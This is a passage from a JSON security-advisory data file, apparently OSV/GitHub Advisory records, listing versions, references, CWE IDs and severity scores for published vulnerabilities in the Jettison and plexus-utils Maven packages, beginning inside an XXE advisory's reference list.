"https://lists.apache.org/thread.html/r68acf97f4526ba59a33cc6e592261ea4f85d890f99e79c82d57dd589%40%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r634468eb3218ab02713128ff6f4818c618622b2b3de4d958138dde49@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r634468eb3218ab02713128ff6f4818c618622b2b3de4d958138dde49%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5f16a1bd31a7e94ca78eda686179930781aa3a4a990cd55986703581@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5f16a1bd31a7e94ca78eda686179930781aa3a4a990cd55986703581%40%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r500867b74f42230a3d65b8aec31fc93ac390eeae737c91a759ab94cb@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r500867b74f42230a3d65b8aec31fc93ac390eeae737c91a759ab94cb%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4bbfa1439d7a4e1712e260bfc3d90f7cf997abfd641cccde6432d4ab@%3Ccommits.cassandra.apache.org%3E" 
}, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4bbfa1439d7a4e1712e260bfc3d90f7cf997abfd641cccde6432d4ab%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48a32f2dd6976d33f7a12b7e09ec7ea1895f8facba82b565587c28ac@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00037.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re646dcc2739d92117bf9a76a33c600ed3b65e8b4e9b6f441e366b72b@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re646dcc2739d92117bf9a76a33c600ed3b65e8b4e9b6f441e366b72b%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re07c51a8026c11e6e5513bfdc66d52d1c1027053e480fb8073356257@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re07c51a8026c11e6e5513bfdc66d52d1c1027053e480fb8073356257%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd3a34d663e2a25b9ab1e8a1a94712cd5f100f098578aec79af48161e@%3Ccommon-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd3a34d663e2a25b9ab1e8a1a94712cd5f100f098578aec79af48161e%40%3Ccommon-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd27730cfc3066dfcf15927c8e800603728d5dedf17eee1f8c6e3507c@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd27730cfc3066dfcf15927c8e800603728d5dedf17eee1f8c6e3507c%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce00a1c60f7df4b10e72fa87827c102f55b074bb91993631df2c21f9@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rce00a1c60f7df4b10e72fa87827c102f55b074bb91993631df2c21f9%40%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8c09b14fd57d855dc21e0a037dc29258c2cbe9c1966bfff453a02e4@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8c09b14fd57d855dc21e0a037dc29258c2cbe9c1966bfff453a02e4%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb47911c179c9f3e8ea3f134b5645e63cd20c6fc63bd0b43ab5864bd1@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb47911c179c9f3e8ea3f134b5645e63cd20c6fc63bd0b43ab5864bd1%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb036bf32e4dacc49335e3bdc1be8e53d6f54df692ac8e2251a6884bd@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb036bf32e4dacc49335e3bdc1be8e53d6f54df692ac8e2251a6884bd%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r21ac3570ce865b8f1e5d26e492aeb714a6aaa53a0c9a6f72ef181556%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1f07e61b3ebabd3e5b4aa97bf1b26d98b793fdfa29a23dac60633f55@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1f07e61b3ebabd3e5b4aa97bf1b26d98b793fdfa29a23dac60633f55%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1edabcfacdad42d3c830464e9cf07a9a489059a7b7a8642cf055542d@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1edabcfacdad42d3c830464e9cf07a9a489059a7b7a8642cf055542d%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r1cc8bce2cf3dfce08a64c4fa20bf38d33b56ad995cee2e382f522f83@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1cc8bce2cf3dfce08a64c4fa20bf38d33b56ad995cee2e382f522f83%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0fbf2c60967bc9f73d7f5a62ad3b955789f9a14b950f42e99fca9b4e@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0fbf2c60967bc9f73d7f5a62ad3b955789f9a14b950f42e99fca9b4e%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0d8c3e32a0a2d8a0b6118f5b3487d363afdda80c996d7b930097383d@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0d8c3e32a0a2d8a0b6118f5b3487d363afdda80c996d7b930097383d%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r08e1b73fabd986dcd2ddd7d09480504d1472264bed2f19b1d2002a9c@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r08e1b73fabd986dcd2ddd7d09480504d1472264bed2f19b1d2002a9c%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r04ecadefb27cda84b699130b11b96427f1d8a7a4066d8292f7f15ed8@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r04ecadefb27cda84b699130b11b96427f1d8a7a4066d8292f7f15ed8%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0066c1e862613de402fee04e81cbe00bcd64b64a2711beb9a13c3b25@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0066c1e862613de402fee04e81cbe00bcd64b64a2711beb9a13c3b25%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10172" }, { 
"type": "WEB", "url": "https://lists.apache.org/thread.html/r48a32f2dd6976d33f7a12b7e09ec7ea1895f8facba82b565587c28ac%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r43c6f75d203b8afc4fbd6c3200db0384a18a11c59d085b1a9bb0ccfe@%3Cuser.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r43c6f75d203b8afc4fbd6c3200db0384a18a11c59d085b1a9bb0ccfe%40%3Cuser.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4176155240cdc36aad7869932d9c29551742c7fa630f209fb4a8e649@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4176155240cdc36aad7869932d9c29551742c7fa630f209fb4a8e649%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r386966780034aadee69ffd82d44555117c9339545b9ce990fe490a3e@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r386966780034aadee69ffd82d44555117c9339545b9ce990fe490a3e%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r385c35a7c6f4acaacf37fe22922bb8e2aed9d322d0fa6dc1d45acddb@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r385c35a7c6f4acaacf37fe22922bb8e2aed9d322d0fa6dc1d45acddb%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r37eb6579fa0bf94a72b6c978e2fee96f68a2b1b3ac1b1ce60aee86cf@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r37eb6579fa0bf94a72b6c978e2fee96f68a2b1b3ac1b1ce60aee86cf%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r356592d9874ab4bc9da4754592f8aa6edc894c95e17e58484bc2af7a@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r356592d9874ab4bc9da4754592f8aa6edc894c95e17e58484bc2af7a%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r33d25a342af84102903cd9dec8338a5bcba3ecfce10505bdfe793b92@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r33d25a342af84102903cd9dec8338a5bcba3ecfce10505bdfe793b92%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r25e25973e9577c62fd0221b4b52990851adf11cbe33036bd67d4b13d@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r25e25973e9577c62fd0221b4b52990851adf11cbe33036bd67d4b13d%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r21ac3570ce865b8f1e5d26e492aeb714a6aaa53a0c9a6f72ef181556@%3Ccommits.cassandra.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2020-02-04T20:42:17Z", "nvd_published_at": "2019-11-18T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-56h3-78gp-v83r", "published": "2022-09-17T00:00:41Z", "modified": "2023-11-08T04:10:22.798161Z", "aliases": [ "CVE-2022-40149" ], "summary": "Jettison parser crash by stackoverflow", "details": "Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. 
This effect may support a denial of service attack.", "affected": [ { "package": { "name": "org.codehaus.jettison:jettison", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.jettison/jettison" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.5.1" } ] } ], "versions": [ "1.0", "1.0-RC1", "1.0-RC2", "1.0-alpha-1", "1.0-beta-1", "1.0.1", "1.1", "1.2", "1.3", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.3.6", "1.3.7", "1.3.8", "1.4.0", "1.4.1", "1.5.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-56h3-78gp-v83r/GHSA-56h3-78gp-v83r.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40149" }, { "type": "WEB", "url": "https://github.com/jettison-json/jettison/issues/45" }, { "type": "WEB", "url": "https://github.com/jettison-json/jettison/pull/49/files" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=46538" }, { "type": "PACKAGE", "url": "https://github.com/jettison-json/jettison" }, { "type": "WEB", "url": "https://github.com/jettison-json/jettison/releases/tag/jettison-1.5.1" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00011.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5312" } ], "database_specific": { "cwe_ids": [ "CWE-121", "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2022-09-20T21:22:04Z", "nvd_published_at": "2022-09-16T10:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7rf3-mqpx-h7xg", "published": "2022-12-13T15:30:26Z", "modified": "2023-11-08T04:10:53.332746Z", "aliases": [ "CVE-2022-45685" ], "summary": "Jettison Out-of-bounds Write vulnerability", "details": "A stack overflow in Jettison before v1.5.2 allows attackers to cause a Denial of 
Service (DoS) via crafted JSON data.", "affected": [ { "package": { "name": "org.codehaus.jettison:jettison", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.jettison/jettison" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.5.2" } ] } ], "versions": [ "1.0", "1.0-RC1", "1.0-RC2", "1.0-alpha-1", "1.0-beta-1", "1.0.1", "1.1", "1.2", "1.3", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.3.6", "1.3.7", "1.3.8", "1.4.0", "1.4.1", "1.5.0", "1.5.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-7rf3-mqpx-h7xg/GHSA-7rf3-mqpx-h7xg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45685" }, { "type": "WEB", "url": "https://github.com/jettison-json/jettison/issues/54" }, { "type": "PACKAGE", "url": "https://github.com/jettison-json/jettison" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5312" } ], "database_specific": { "cwe_ids": [ "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2023-01-04T14:27:01Z", "nvd_published_at": "2022-12-13T15:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-grr4-wv38-f68w", "published": "2022-12-13T15:30:27Z", "modified": "2023-11-08T04:10:53.577855Z", "aliases": [ "CVE-2022-45693" ], "summary": "Jettison Out-of-bounds Write vulnerability", "details": "Jettison before v1.5.2 was discovered to contain a stack overflow via the map parameter. 
This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.", "affected": [ { "package": { "name": "org.codehaus.jettison:jettison", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.jettison/jettison" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.5.2" } ] } ], "versions": [ "1.0", "1.0-RC1", "1.0-RC2", "1.0-alpha-1", "1.0-beta-1", "1.0.1", "1.1", "1.2", "1.3", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.3.6", "1.3.7", "1.3.8", "1.4.0", "1.4.1", "1.5.0", "1.5.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-grr4-wv38-f68w/GHSA-grr4-wv38-f68w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45693" }, { "type": "WEB", "url": "https://github.com/jettison-json/jettison/issues/52" }, { "type": "PACKAGE", "url": "https://github.com/jettison-json/jettison" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5312" } ], "database_specific": { "cwe_ids": [ "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2023-01-04T14:25:45Z", "nvd_published_at": "2022-12-13T15:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q6g2-g7f3-rr83", "published": "2023-03-22T06:30:21Z", "modified": "2024-02-20T05:34:09.671471Z", "aliases": [ "CVE-2023-1436" ], "summary": "Jettison vulnerable to infinite recursion", "details": "An infinite recursion is triggered in Jettison when constructing a JSONArray from a Collection that contains a self-reference in one of its elements. 
This leads to a StackOverflowError exception being thrown.", "affected": [ { "package": { "name": "org.codehaus.jettison:jettison", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.jettison/jettison" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.5.4" } ] } ], "versions": [ "1.0", "1.0-RC1", "1.0-RC2", "1.0-alpha-1", "1.0-beta-1", "1.0.1", "1.1", "1.2", "1.3", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.3.6", "1.3.7", "1.3.8", "1.4.0", "1.4.1", "1.5.0", "1.5.1", "1.5.2", "1.5.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/03/GHSA-q6g2-g7f3-rr83/GHSA-q6g2-g7f3-rr83.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1436" }, { "type": "WEB", "url": "https://github.com/jettison-json/jettison/issues/60" }, { "type": "WEB", "url": "https://github.com/jettison-json/jettison/pull/62" }, { "type": "PACKAGE", "url": "https://github.com/jettison-json/jettison" }, { "type": "WEB", "url": "https://github.com/jettison-json/jettison/releases/tag/jettison-1.5.4" }, { "type": "WEB", "url": "https://research.jfrog.com/vulnerabilities/jettison-json-array-dos-xray-427911" } ], "database_specific": { "cwe_ids": [ "CWE-674" ], "github_reviewed": true, "github_reviewed_at": "2023-03-22T21:23:09Z", "nvd_published_at": "2023-03-22T06:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-x27m-9w8j-5vcw", "published": "2022-09-17T00:00:41Z", "modified": "2024-02-16T08:08:08.595900Z", "aliases": [ "CVE-2022-40150" ], "summary": "Jettison memory exhaustion", "details": "Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). 
If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by Out of memory. This effect may support a denial of service attack.", "affected": [ { "package": { "name": "org.codehaus.jettison:jettison", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.jettison/jettison" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.5.2" } ] } ], "versions": [ "1.0", "1.0-RC1", "1.0-RC2", "1.0-alpha-1", "1.0-beta-1", "1.0.1", "1.1", "1.2", "1.3", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.3.6", "1.3.7", "1.3.8", "1.4.0", "1.4.1", "1.5.0", "1.5.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-x27m-9w8j-5vcw/GHSA-x27m-9w8j-5vcw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40150" }, { "type": "WEB", "url": "https://github.com/jettison-json/jettison/issues/45" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=46549" }, { "type": "PACKAGE", "url": "https://github.com/jettison-json/jettison" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5312" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-674" ], "github_reviewed": true, "github_reviewed_at": "2022-09-20T21:20:42Z", "nvd_published_at": "2022-09-16T10:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8vhq-qq4p-grq3", "published": "2022-05-13T01:11:53Z", "modified": "2025-01-14T06:59:30.610519Z", "aliases": [ "CVE-2017-1000487" ], "summary": "OS Command Injection in Plexus-utils", "details": "Plexus-utils before 3.0.16 is vulnerable to command injection because it does not correctly process the contents of double quoted 
strings.", "affected": [ { "package": { "name": "org.codehaus.plexus:plexus-utils", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.plexus/plexus-utils" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.0.16" } ] } ], "versions": [ "1.0.4", "1.0.5", "1.1", "1.2", "1.3", "1.4", "1.4-alpha-1", "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.4.5", "1.4.6", "1.4.7", "1.4.8", "1.4.9", "1.5", "1.5.1", "1.5.10", "1.5.11", "1.5.12", "1.5.13", "1.5.14", "1.5.15", "1.5.2", "1.5.3", "1.5.4", "1.5.5", "1.5.6", "1.5.7", "1.5.8", "1.5.9", "2.0.0", "2.0.1", "2.0.2", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.1", "3.0", "3.0.1", "3.0.10", "3.0.11", "3.0.12", "3.0.13", "3.0.14", "3.0.15", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-8vhq-qq4p-grq3/GHSA-8vhq-qq4p-grq3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000487" }, { "type": "WEB", "url": "https://github.com/codehaus-plexus/plexus-utils/commit/b38a1b3a4352303e4312b2bb601a0d7ec6e28f41" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4149" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4146" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGCODEHAUSPLEXUS-31522" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/01/msg00011.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/01/msg00010.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r9584c4304c888f651d214341a939bd264ed30c9e3d0d30fe85097ecf@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9584c4304c888f651d214341a939bd264ed30c9e3d0d30fe85097ecf%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2e94f72f53df432302d359fd66cfa9e9efb8d42633d54579a4377e62@%3Cdev.avro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2e94f72f53df432302d359fd66cfa9e9efb8d42633d54579a4377e62%40%3Cdev.avro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/codehaus-plexus/plexus-utils" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1322" } ], "database_specific": { "cwe_ids": [ "CWE-78" ], "github_reviewed": true, "github_reviewed_at": "2022-07-01T21:47:32Z", "nvd_published_at": "2018-01-03T20:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g6ph-x5wf-g337", "published": "2023-09-25T21:30:26Z", "modified": "2024-05-03T20:31:38.024044Z", "aliases": [ "CVE-2022-4244" ], "summary": "plexus-codehaus vulnerable to directory traversal", "details": "A flaw was found in plexus-codehaus. A directory traversal attack (also known as path traversal) aims to access files and directories stored outside the intended folder. 
By manipulating files with dot-dot-slash (`../`) sequences and their variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration, and other critical system files. ", "affected": [ { "package": { "name": "org.codehaus.plexus:plexus-utils", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.plexus/plexus-utils" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.0.24" } ] } ], "versions": [ "1.0.4", "1.0.5", "1.1", "1.2", "1.3", "1.4", "1.4-alpha-1", "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.4.5", "1.4.6", "1.4.7", "1.4.8", "1.4.9", "1.5", "1.5.1", "1.5.10", "1.5.11", "1.5.12", "1.5.13", "1.5.14", "1.5.15", "1.5.2", "1.5.3", "1.5.4", "1.5.5", "1.5.6", "1.5.7", "1.5.8", "1.5.9", "2.0.0", "2.0.1", "2.0.2", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.1", "3.0", "3.0.1", "3.0.10", "3.0.11", "3.0.12", "3.0.13", "3.0.14", "3.0.15", "3.0.16", "3.0.17", "3.0.18", "3.0.19", "3.0.2", "3.0.20", "3.0.21", "3.0.22", "3.0.23", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-g6ph-x5wf-g337/GHSA-g6ph-x5wf-g337.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4244" }, { "type": "WEB", "url": "https://github.com/codehaus-plexus/plexus-utils/issues/4" }, { "type": "WEB", "url": "https://github.com/codehaus-plexus/plexus-utils/commit/33a2853df8185b4519b1b8bfae284f03392618ef" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2023:2135" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2023:3906" }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2022-4244" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2149841" }, { "type": "WEB", "url": 
"https://security.snyk.io/vuln/SNYK-JAVA-ORGCODEHAUSPLEXUS-31521" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2023-09-26T17:59:40Z", "nvd_published_at": "2023-09-25T20:15:10Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jcwr-x25h-x5fh", "published": "2023-09-25T21:30:26Z", "modified": "2024-05-03T20:32:52.547057Z", "aliases": [ "CVE-2022-4245" ], "summary": "codehaus-plexus vulnerable to XML injection", "details": "A flaw was found in codehaus-plexus. The `org.codehaus.plexus.util.xml.XmlWriterUtil#writeComment` fails to sanitize comments for a `--\u003e` sequence. This issue means that text contained in the command string could be interpreted as XML and allow for XML injection. ", "affected": [ { "package": { "name": "org.codehaus.plexus:plexus-utils", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.plexus/plexus-utils" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.0.24" } ] } ], "versions": [ "1.0.4", "1.0.5", "1.1", "1.2", "1.3", "1.4", "1.4-alpha-1", "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.4.5", "1.4.6", "1.4.7", "1.4.8", "1.4.9", "1.5", "1.5.1", "1.5.10", "1.5.11", "1.5.12", "1.5.13", "1.5.14", "1.5.15", "1.5.2", "1.5.3", "1.5.4", 